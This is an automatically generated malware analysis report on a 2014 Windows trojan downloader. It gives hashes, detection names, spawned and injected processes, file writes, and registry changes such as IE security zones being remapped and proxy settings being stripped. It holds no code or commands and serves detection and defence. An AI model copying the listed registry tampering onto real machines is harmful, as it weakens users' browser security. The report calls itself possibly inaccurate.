Trojan.NSIS.StartPage_a0b7a72292

by malwarelabrobot on June 30th, 2014 in Malware Descriptions.

Trojan-Downloader.Win32.Genome.hapt (Kaspersky), Dropped:Trojan.Generic.11320244 (AdAware), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.Sasfis.FD, Trojan.Win32.Swrort.3.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: a0b7a7229270b045ed33322da028d711
SHA1: 1d4894593b616abda0ce8c2cc005600df68d77a2
SHA256: 184c12b1e870134a201b2747bb96eca32dddedbd806accd1527f315c8cd2639d
SSDeep: 24576:9OnGfdRGmay4PjE9bUix084d2mVWca83VSQCbLL0BnqQy:9eGfjGfjkoPwx8cHbLIBnW
Size: 1195779 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Appinstallr
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

bddownloader.exe:3092
shandian.exe:1480
dudu_b_55045.exe:668
BDDownloader.exe:3960
BDDownloader.exe:3520
regsvr32.exe:1936
BDKVWsc.exe:2740
RegSvr32.exe:468
RegSvr32.exe:3168

The Trojan injects its code into the following process(es):

shandian.exe:2548
pczh_98_2.exe:3228
%original file name%.exe:2644
sdad.exe:304
F30241_s_0523.exe:544
ionrkf_70688.exe:280

Mutexes

The following mutexes were created/opened:

File activity

The process shandian.exe:1480 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DF34A5.tmp (0 bytes)

The process shandian.exe:2548 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\shandian\bin\twcache.ini (1392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\123_sogou_com[1].txt (15456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\newioage[1].css (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\welcome_cn[1].htm (1469 bytes)
%Program Files%\shandian\bin\shandian.ini.tmp (244 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\shandian\bin\theworld.ac (196 bytes)

The Trojan deletes the following file(s):

%Program Files%\shandian\bin\shandian.ini (0 bytes)

The process pczh_98_2.exe:3228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvBE.tmp (21176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif (911 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskBD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfBF.tmp (0 bytes)
%Documents and Settings%\%current user%\Templates\2920146065436\YYM_955WD30.gif (0 bytes)

The process %original file name%.exe:2644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

The process sdad.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\cpc_img[1].htm (442 bytes)
%Documents and Settings%\%current user%\Cookies\YWNRAD2W.txt (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\cpv1[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\tj[1].js (279 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\miniindex[1].htm (3687 bytes)
%Program Files%\shandian\bin\update\PopWinParam.xml (196 bytes)
%Documents and Settings%\%current user%\Cookies\FQ5A68D9.txt (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\stylemini[1].css (4968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\jquery-1.7.2.min[1].js (47317 bytes)

The process dudu_b_55045.exe:668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\6290556124\skinconfig\installedSoftInfo.ini (0 bytes)

The process F30241_s_0523.exe:544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (676 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\ToastLogo.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMRepMgr.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMUpdate.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDLogicUtils.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMNet.dll (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\System.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMPatchAgent.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (2916 bytes)
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Perflib_Perfdata_d84.dat (100 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMAVE.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastLogo.ico (2105 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDDownLoadProtectPlugin.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\baidusd\Config\806.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\809.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\iexplore.exe.xml (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\baidusdRepair.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\bdmp.dat (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\updlog.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\HIPS.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nspB6.tmp\file\BDShellExt.dll (15168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Cookies (4 bytes)

The Trojan deletes the following file(s):


The process BDDownloader.exe:3960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)

The process BDDownloader.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdBB.tmp (90616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-29-0-5-59]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (784 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nstBA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBC.tmp\System.dll (0 bytes)

The process ionrkf_70688.exe:280 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):


The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsgB9.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca.bak (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbB7.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (0 bytes)

Registry activity

The process bddownloader.exe:3092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\0\win32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\LocalServer32]
"(Default)" = "c:\program files\common files\baidu\bddownload\106\bddownloader.exe"

[HKCR\BDDownloadProxy.Downloader.1]
"(Default)" = "Downloader Class"

[HKCR\BDDownloadProxy.Downloader.1\CLSID]
"(Default)" = "{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\BDDownloadProxy.Downloader]
"(Default)" = "Downloader Class"

[HKCR\AppID\{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}]
"(Default)" = "DownloadProxy"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"(Default)" = "Downloader Class"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\ProgID]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"netsh.exe" = "Network Command Shell"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"Version" = "1.0"

[HKCR\AppID\DownloadProxy.EXE]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\HELPDIR]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 7C E9 81 DB C4 5B 19 C4 2E 3C E5 AB 8A F4 1F"

[HKCR\BDDownloadProxy.Downloader\CurVer]
"(Default)" = "BDDownloadProxy.Downloader.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}\TypeLib]
"(Default)" = "{DA624F8F-98BF-4B03-AD11-A12D07119E81}"

[HKCR\Interface\{E7270EC6-0113-4A78-B610-E501D0A9E48E}]
"(Default)" = "_IDownloaderEvents"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}]
"AppID" = "{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0]
"(Default)" = "DownloadProxy 1.0 Type Library"

[HKCR\TypeLib\{DA624F8F-98BF-4B03-AD11-A12D07119E81}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}\VersionIndependentProgID]
"(Default)" = "BDDownloadProxy.Downloader"

[HKCR\Interface\{7044CE4B-FE34-4DD1-A0FA-157E1E179ECA}]
"(Default)" = "IDownloader"

The Trojan modifies IE settings for security zones to map all local web nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The process shandian.exe:1480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 6B 87 EC A5 46 6E 63 4A 37 30 35 A2 89 75 EE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shandian.exe:2548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Size" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"InitHits" = "100"

[HKCU\Software\Microsoft\Internet Explorer\International]
"W2KLpk" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Enable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_LMZ_SCRIPT]
"shandian.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\International\CpMRU]
"Factor" = "20"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"ieframe.dll.mui,-12385" = "Favorites Bar"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE]
"shandian.exe" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 22 B1 30 05 3E 63 65 75 98 52 A6 FA 46 3E B6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process pczh_98_2.exe:3228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2D 79 EC DF 95 C8 D2 EC A8 34 97 6C 34 05 14"

[HKLM\SOFTWARE\tyoh]
"EN" = "pczh_98_2.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\tyoh]
"ED" = "98"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

